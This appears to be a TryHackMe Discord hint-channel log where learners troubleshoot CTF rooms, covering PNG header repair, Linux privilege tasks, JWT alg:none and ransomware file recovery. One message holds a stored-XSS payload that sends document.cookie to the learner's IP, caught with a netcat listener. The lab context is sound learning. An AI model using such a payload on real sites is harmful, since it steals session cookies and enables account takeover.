@arctic crystal Then you are doing something wrong
Because I do not have that issue
is it maybe because I try to connect my vpn both in VM and my host machine?
Yeah
Yes, don't do that
Don't do that, it makes bad things happen
You have a single VPN IP, it can't be shared by both without NAT
And Jabba sad, you don't want to make Jabba sad :(
yeah I stopped doing that now
Otherwise, how does it know where to send the data?
Enumerate harder
@stuck fractal
I did more enumeration and found one image which has some errors and it is not opening nor the steghide supports its format and zsteg and binwalk also give nothing
What type of image is it?
What do the header bytes say? What does the file extension say? What do file trailers etc say?
(These are rhetorical)
png
also where can I see header bytes and that trailers you say
Warning: PNG image did not start with IHDR
I get this warning though
Ok, but do the trailers etc match PNG?
@stuck fractal how to check that
Well, sounds pretty straight forward to me. Find out the structure of a PNG, see if it matches
no not like that I'm asking how can I view the headers and trailers of the image I have with me
How would you look at a file if you want a human-readable representation of raw bytes?
sorry I don't know that
binary files like images aren't the same as text. if you want to look at file headers and such, you should probably use a hex editor to see the raw data
xxd is probably available on your system, so you might check that first, though for future tasks you might need other tools as well.
ok I'll check that thank you
ok I have got this now, do the numbers in first line represent header?
ok
ok so 8950 4e47 0d0a 1a0a is png signature and image header is after it
but IHDR should be mentioned I guess for image header which I cant see here in my image
So maybe it's not a PNG then
it matches the png signature but other things are missing
ya
it matches jpeg format but only signature is different
how can I edit that signature
Using a hex editor
xxd works for it or I'll need to install one of these
Bless, ghex
Sounds like a google question to me
ya found it
hello, i need help in anthem VM box, i am at task 3, question 2. I dont know the username of the account so i cant ssh. What should i do? Thanks
help or hint? help=> #room-help
hint: usernames are sometimes re-used in different ways for different services
i think i gave you a pretty good hint. If you are looking for the answers, then try a writeup. there's not much else I can hint at without just typing the answer for you here
please don't bro people. it's kind of disrespectful
sorry, i will try now
@arctic crystal I fell in that trap as well lol. Took me 15 mins to realise my mistake on that file
Hi Guys. I am newbie student. Trying to complete my first room: "Learn Linux". Task 43. Is the last task. But, i dont know how can I get root permissions to see the file at /root/root.txt If someone knows a hint...I appreciate every kind suggestion.
I recommend looking back, it describes the most common way that a genuine user can run things as root
Using sudo
thanks. I'll try harder.
My tip would be to make sure you have all the users on the box, not just the shibas
And look for files that are out of place
Maybe search for files belonging to each user one by one
yeah. I notice that i have the passwords for all the shibas.....but no one is at sudoers file
But I think this is the challenge...try to discovery myself
thanks one more time. I will check with more attention for all the files
maybe there is another user you haven't found yet?
(or a couple of them)
there 2 more users: noot & nootnoot And i dont have any idea how to get their passwords...lol. But i will keep try
Maybe search for files belonging to each user one by one
That's my hint for you RN
@stuck fractal Great Hint...! very nice! i'll check these files again with more attention
thank you guys! helps a lot
Find is really useful . Very nice challenge
Starting Nmap 7.60 ( https://nmap.org ) at 2020-08-09 12:21 WIB
Couldn't open a raw socket. Error: Permission denied (13)
can you help me
i'm running with ubuntu
Hey guys I'm unable to login to the OSCP Buffer Overflow Prep machine using xfreerdp. Any solution?
Stick to one chat @next oxide When someone who knows about your issue sees your message, they will answer π
Yeah okay
hey lads
does anyone know where password are stored by any chance?
nvm, figured it out
Room: https://tryhackme.com/room/intronetworking
Task 9: #4 Where is the very first place your computer would look to find the ip address of a domain?
I google it and i can't find nothing
What?
You should be able to find some stuff googling
90% or something like that of THM questions can be found by googling a bit
@white salmon look up how DNS works.
there is no need of googling, just read the paragraph that was before your question
the answer is in the same paragraph 
read harder
the purpose of the room is reading the contents xD
Yes, i read all except this task
lol
i writed before the answer but i bad typing
Thanks to all for help me
hello anyone , im in recovery room , im success to decrypt files in webserver but why flag5 not open
@sick sun did you restore the decrypted files?
@short fox yes i was decrypted files on ||htdocs||
@sick sun not sure then. Double check to make sure they're all decrypted properly with the right key and all the names are correct.
@short fox yes i was decrypted all files in || htdocs || , title index.html is || Recoverysoft || ?
Did you put the decrypted files back into the machine?
@sick sun all the file names of the decrypted files should be exactly the same as the encrypted ones. Just replace the encrypted files with the decrypted ones using the same names.
yes i was do all but flag5 not showing up " || index.html reallyimportant.txt todo.html ||
I'm not sure then. My only guess would be a problem with the decryption.
your own machine
should I exit out of ssh and use my own terminal?
or your kali machine

im guessing this wasn't meant to happen
any idea how to get it working?
i used the exact command THM told me to use
what?
look
oof
your lhost is wrong
yeah?
Learn to read error messages, they're very informative
oh true I just saw it
im meant to put my own ip
ah, thanks man, I didn't really look at the command too carefully
Hi! who can I ask for help with the Linux Challenges room?
yeah, just ask
Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.
How do I search for strings in all files?
but grep looks at the file names and not their content.... no?
yes, but grep have to know how to separate each file
i suggest to read the writeup
thats the most difficult on the room
that flag
read the command and try to understand it
cool, thanks, wasnt aware there was a write up. will check.
if you dont understand something on the command, do your research and if you dont know something ask here
@sick sun I'm not sure then. Have you checked the write up and tried another method to see if there's any change?
@vale bramble #room-hints is usually for people who want to avoid write-ups :)
yeah but that flag in specific is very hard, and there is a lot of parameters to explain,that would be too much, for me it was better to look writeup and do own research. anyway, i will have it in mind, thx
If you don't want to explain it, or you don't feel able to give a hint, you don't have to.
i have no problem of explaining the whole comand and i feel able, i only suggest him to ask about something specific he dont understand about the command, thats all
This channel is for hints, best not to point people to writeups if they just want a hint?
you are right, thats why i said i will have it in mind
task 23 day 18
I got the answer but THM is not accepting it
is there any problem with that task?
Nope.
No your answer is wrong
can I post answer here? to check
@stuck fractal
Wrong value @arctic crystal
ok
ok then any hint on what I'm doing wrong ?
You're going to the page yourself?
||</p><script>window.location = 'http://<my-machine-ip>/page?param=' + document.cookie </script><p>||
I'm running this command in the text box and starting nc -nlvp 80 on terminal
ok
If you visit the page, you'll steal your own cookie
I was refreshing the page after starting listener again
I'm in: https://tryhackme.com/room/django Task 3: 4. Migrate your changes by running python3 manage.py migrate
I have errors when i try that command, and i do all the steps
What are the errors?
The last line is the only one that matters
You see the last line, it tells you exactly what's wrong
Do you have basic knowledge in python?
What does the error say?
@white salmon remove the {} in your path() variable
they were there for demonstration
1 sec
@glossy basin That i was thinking
use this
it's an exact same example that works
Just browse files there and compare to you ones
Ok, thank you. I will read the settings.py and the urls.py and solve my issue
It doesn't
Same error
did you migrate before creating any apps?
Hi, i have a problem with the room zthobscurewebvulns / task#18 (challenge jsonWT alg:none), if i modify only alg by none, it work but when i modify the role by admin, the vm crashes
i don't understand, the difference between changing the header and payload.. this is the same functionality right? (decode, modify, encode)
(done)
lol after hours trying to read the same reviews on the juice store found his brother name.... this was so far fetched I would never in a million years keep looking at his reviews if it wasnt for the help....
@wind fog yes. Did you leave off the signature and just end with the . ?
